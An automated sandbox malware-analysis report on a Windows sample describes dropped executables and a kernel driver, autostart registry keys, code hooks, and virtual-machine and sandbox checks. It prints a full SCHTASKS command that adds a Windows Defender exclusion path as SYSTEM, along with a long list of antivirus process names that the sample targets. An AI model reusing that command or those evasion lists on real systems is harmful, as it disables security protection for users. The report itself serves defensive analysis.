File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: 0000000000000000.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 0000000000000000.exe

Static file information: File size 31322802 > 1048576

Source: 0000000000000000.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: Nw13Wr.exe, 00000027.00000002.3518373727.000000000082E000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000000.2769121869.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, Nw13Wr.exe, 00000027.00000002.3518617798.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, Nw13Wr.exe, 00000028.00000000.2794834354.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, Nw13Wr.exe, 00000028.00000002.2812479258.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, aPkMBkaA.exe, 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmp, aPkMBkaA.exe, 00000029.00000000.2800597986.0000000000948000.00000002.00000001.01000000.0000000C.sdmp, Nw13Wr.exe, 0000002C.00000002.2976998004.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, Nw13Wr.exe, 0000002C.00000000.2964486452.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, aPkMBkaA.exe, 0000002D.00000002.2978478462.0000000000948000.00000002.00000001.01000000.0000000C.sdmp, aPkMBkaA.exe, 0000002D.00000000.2970455672.0000000000948000.00000002.00000001.01000000.0000000C.sdmp, Nw13Wr.exe.5.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: GoogleUpdateComRegisterShell64_unsigned.pdb source: 0000000000000000.exe
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: qWXt7a.exe, 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmp, qWXt7a.exe, 00000004.00000000.2305123527.0000000140014000.00000002.00000001.01000000.00000008.sdmp, qWXt7a.exe, 00000005.00000000.2323536652.0000000140014000.00000002.00000001.01000000.00000008.sdmp, qWXt7a.exe.0.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Unpacked PE file: 39.2.Nw13Wr.exe.2590000.3.unpack
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Unpacked PE file: 39.2.Nw13Wr.exe.4950000.7.unpack

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000014000F000

Source: initial sample

Static PE information: section where entry point is pointing to: .mo:

Source: tbcore3U.dll.5.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.5.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.39.dr	Static PE information: section name: .mo:

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Code function: 39_2_00BF2691 push ecx; ret		39_2_00BF26A4
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Code function: 41_2_00942691 push ecx; ret		41_2_009426A4

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\0000000000000000.exe	File created: C:\Users\user\Documents\vselog.dll			Jump to dropped file
Source: C:\Users\user\Desktop\0000000000000000.exe	File created: C:\Users\user\Documents\qWXt7a.exe			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	File created: C:\Program Files (x86)\W9sgnm2c\tbcore3U.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0000000000000000.exe	File created: C:\Windows\System32\drivers\189atohci.sys	Jump to dropped file
Source: C:\Users\user\Documents\qWXt7a.exe	File created: C:\Program Files (x86)\Nw13Wr\tbcore3U.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0000000000000000.exe	File created: C:\Users\user\Documents\vselog.dll	Jump to dropped file
Source: C:\Users\user\Documents\qWXt7a.exe	File created: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\0000000000000000.exe	File created: C:\Users\user\Documents\qWXt7a.exe	Jump to dropped file
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	File created: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Jump to dropped file

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe

Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron

Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe

4_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\qWXt7a.exe	Memory written: PID: 8152 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Memory written: PID: 8152 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Memory written: PID: 8184 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Memory written: PID: 8184 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Memory written: PID: 7976 base: 7F0005 value: E9 8B 2F 71 76	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Memory written: PID: 7976 base: 76F02F90 value: E9 7A D0 8E 89	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Memory written: PID: 7976 base: 810005 value: E9 8B 2F 6F 76	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Memory written: PID: 7976 base: 76F02F90 value: E9 7A D0 90 89	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Memory written: PID: 2848 base: D60005 value: E9 8B 2F 1A 76
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Memory written: PID: 2848 base: 76F02F90 value: E9 7A D0 E5 89
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Memory written: PID: 4840 base: DE0005 value: E9 8B 2F 12 76
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Memory written: PID: 4840 base: 76F02F90 value: E9 7A D0 ED 89
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Memory written: PID: 3964 base: EF0005 value: E9 8B 2F 01 76
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Memory written: PID: 3964 base: 76F02F90 value: E9 7A D0 FE 89
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Memory written: PID: 3900 base: 1010005 value: E9 8B 2F EF 75
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Memory written: PID: 3900 base: 76F02F90 value: E9 7A D0 10 8A

Source: C:\Users\user\Documents\qWXt7a.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C4DB056
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C3E5143
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C4DCBDE
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C537C0E
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C5291B6
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C3EFFCB
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C42080B
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 36FED6D
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 32F4BC8
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 36FB637
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 32DFE84
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 36F50CF
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 36B7AA6
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 32B10CD
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C4CA702
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C4D1EB4
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BDA9F9E
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BC8A03F
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BC890FC
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BCD87AA
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C4B5F8C
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C4F6E74
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C46C0AF
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BD1F839
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BC88B19
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BCE080B
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BDE91B6
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C40F34F
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BDC8092
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BDC7C0E
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BC5A03F
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C422089
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C488647
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API/Special instruction interceptor: Address: 6C3BF12B
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BDB91B6
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BBCDE34
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	API/Special instruction interceptor: Address: 6BD86E74

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
Source: Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\0000000000000000.exe	RDTSC instruction interceptor: First address: 1400010FF second address: 140001115 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d mov ecx, eax 0x0000000f nop 0x00000010 fldpi 0x00000012 nop 0x00000013 frndint 0x00000015 nop 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0000000000000000.exe	RDTSC instruction interceptor: First address: 140001115 second address: 140001115 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d sub eax, ecx 0x0000000f nop 0x00000010 dec ecx 0x00000011 cmp eax, ecx 0x00000013 nop 0x00000014 jc 00007F936CEB64A6h 0x00000016 fldpi 0x00000018 nop 0x00000019 frndint 0x0000001b nop 0x0000001c rdtsc
Source: C:\Users\user\Documents\qWXt7a.exe	RDTSC instruction interceptor: First address: 6AEB35 second address: 6AEB43 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Users\user\Desktop\0000000000000000.exe

Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_39-2693
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_39-2706
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_41-3255
Source: C:\Users\user\Documents\qWXt7a.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_4-14031

Source: C:\Users\user\Documents\qWXt7a.exe	API coverage: 2.7 %
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API coverage: 7.6 %

Source: C:\Users\user\Documents\qWXt7a.exe TID: 7316	Thread sleep time: -46000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe TID: 5236	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe TID: 5236	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe TID: 4020	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe TID: 5184	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe TID: 5460	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe TID: 1464	Thread sleep count: 77 > 30	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe TID: 1464	Thread sleep time: -38500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe TID: 1784	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe TID: 2448	Thread sleep count: 61 > 30	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe TID: 2448	Thread sleep time: -30500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe TID: 5460	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\qWXt7a.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_00007FFE1320A1B8 FindFirstFileExW,

4_2_00007FFE1320A1B8

Source: C:\Users\user\Documents\qWXt7a.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: 0000000000000000.exe	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_5e38a278d114b813
Source: 0000000000000000.exe	Binary or memory string: VMware
Source: 0000000000000000.exe	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: 0000000000000000.exe, 00000000.00000003.2132388125.00000000005C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW9
Source: 0000000000000000.exe	Binary or memory string: VMware Virtual USB Mouse
Source: 0000000000000000.exe	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.17369862.B64.2012240522,BiosReleaseDate:12/24/2020,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1\
Source: 0000000000000000.exe	Binary or memory string: VMware, Inc.e
Source: 0000000000000000.exe	Binary or memory string: vmci.syshbin
Source: 0000000000000000.exe	Binary or memory string: VMware, Inc.
Source: 0000000000000000.exe	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 0000000000000000.exe	Binary or memory string: VMware-42 17 53 71 ea 62 82 e8-b2 93 b7 a7 7f 7a dc 93
Source: 0000000000000000.exe, 00000000.00000003.2132388125.00000000005C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0000000000000000.exe	Binary or memory string: VMware VMCI Bus Device0
Source: 0000000000000000.exe	Binary or memory string: Manufacturer VMware, Inc.(vk
Source: 0000000000000000.exe	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.16460286.B64.2006250725,BiosReleaseDate:06/25/2020,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1(vk
Source: 0000000000000000.exe	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&354ae4d7&0&000000
Source: 0000000000000000.exe	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 0000000000000000.exe	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: 0000000000000000.exe	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,root\vmwvmcihostdev
Source: 0000000000000000.exe	Binary or memory string: vmci.inf_amd64_5e38a278d114b813,
Source: 0000000000000000.exe	Binary or memory string: vmci.sys
Source: 0000000000000000.exe	Binary or memory string: \driver\vmci,\driver\pci
Source: 0000000000000000.exe	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&354ae4d7&0&000000
Source: 0000000000000000.exe	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 0000000000000000.exe	Binary or memory string: VMware7,1
Source: 0000000000000000.exe	Binary or memory string: NECVMWar VMware SATA CD00
Source: 0000000000000000.exe	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 0000000000000000.exe	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 0000000000000000.exe	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: 0000000000000000.exe	Binary or memory string: VMware7,1p
Source: 0000000000000000.exe	Binary or memory string: VMware PCI VMCI Bus Device
Source: 0000000000000000.exe	Binary or memory string: vmci.inf_amd64_5e38a278d114b813
Source: 0000000000000000.exe	Binary or memory string: VMware VMCI Bus Device
Source: 0000000000000000.exe	Binary or memory string: VMware, Inc.ps
Source: Nw13Wr.exe, 00000027.00000002.3518373727.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: 0000000000000000.exe	Binary or memory string: VMware, Inc.00

Source: C:\Users\user\Documents\qWXt7a.exe	API call chain: ExitProcess graph end node	graph_4-14032
Source: C:\Users\user\Documents\qWXt7a.exe	API call chain: ExitProcess graph end node	graph_4-14376
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	API call chain: ExitProcess graph end node	graph_39-2708

Source: C:\Users\user\Desktop\0000000000000000.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_00000001400073E0 LdrLoadDll,

4_2_00000001400073E0

Source: C:\Users\user\Documents\qWXt7a.exe

